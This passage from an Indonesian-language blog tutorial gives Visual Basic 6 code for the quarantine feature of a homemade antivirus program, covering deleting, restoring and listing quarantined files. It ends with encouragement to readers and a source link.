If lvQ.ListItems.Count = 0 Then Exit Sub
Dim Data() As String
If PathFileExists(Dat) <> 0 Then
Open Dat For Input As #1
Input #1, isi
Close #1
DeleteFile Dat
Else
isi = ""
End If
Data = Split(isi, "|")
For i = 1 To UBound(Data)
namafile = lvQ.SelectedItem.SubItems(2)
If namafile <> Split(Data(i), "?")(1) Then
nyu = nyu & "|" & Data(i)
End If
Next
DeleteFile AppPath & "Quarantine\" & lvQ.SelectedItem.SubItems(1)
Open Dat For Output As #2
Print #2, nyu
Close #2
MsgBox "Success Deleting File !!!", vbInformation, ""
UpdateQ

code di atas berfungsi untuk menghapus file yang telah di karantina

Masukan code di bawah ini ke Command [ cmdRestore ]
Spoiler
'Code:
If lvQ.ListItems.Count = 0 Then Exit Sub
Select Case Index
Case 0
DecodeFile AppPath & "Quarantine\" & lvQ.SelectedItem.SubItems(1), lvQ.SelectedItem.SubItems(2)
MsgBox "File Restored to " & Chr(34) & lvQ.SelectedItem.SubItems(2) & Chr(34) & " !!!", vbInformation, ""
Case 1
sTitle = "Select path:" & vbNewLine & "Select path to restore file."
ThePath = BrowseFolder(sTitle, Me)
If ThePath <> "" Then
DecodeFile AppPath & "Quarantine\" & lvQ.SelectedItem.SubItems(1), ThePath & GetFileName(lvQ.SelectedItem.SubItems(2))
MsgBox "File Restored to " & Chr(34) & ThePath & GetFileName(lvQ.SelectedItem.SubItems(2)) & Chr(34) & " !!!", vbInformation, ""
End If
End Select

Fungsi code di atas berguna untuk me restore file kembali ke asalnya.

lalu pada Form_Load() tambahkan code di bawah ini.
Spoiler
'Code:
frmUtama.Enabled = False
Dat = AppPath & "Quarantine\HN.dat"
UpdateQ


Masukan code di bawah ini ke dalam frmQuarantine yang telah anda buat tadi.
Spoiler
'Code:
Dim Dat As String
Private Sub UpdateQ()
lvQ.ListItems.Clear
Dim Data() As String
If PathFileExists(Dat) = 0 Then Exit Sub
Open Dat For Input As #1
Input #1, isi
Close #1
Data = Split(isi, "|")
For i = 1 To UBound(Data)
With lvQ.ListItems.Add(, , Split(Data(i), "?")(0))
.SubItems(1) = Split(Data(i), "?")(2)
.SubItems(2) = Split(Data(i), "?")(1)
End With
Next
Me.Caption = "Quarantine (" & lvQ.ListItems.Count & ")"
End Sub

Berfungsi untuk memanggil data yang ada di folder karantina.

Hanya itu ilmu yang bisa saya bagikan. sekarang kita bukan hanya sebagai pemakai atau user sekrang kita sudah bisa mmembuat antivirus.

dan ini adalah Screenshot antivirus yang kita buat tadi saat melakukan scanning.


Note : Jika anda membaca dan mencoba dengan teliti dan seksama anda pasti berhasil.

Orang yang berhasil adalah orang yang banyak mecoba.

Untuk masalah source code anda bisa meminta kepada saya tapi dengan satu syarat, yaitu anda harus menyertakan bukti bahwa anda telah mencoba entah itu dalam bentuk screenshot atau yang lainnya.

Untuk yang belum punya Visual Basic 6.0 bisa download disini 
kutipan :http://bayuadiguna46.blogspot.com/search/label/CARA%20MEMBUAT%20ANTIVIRUS%20DENGAN%20VISUAL%20BASIC%206
READ MORE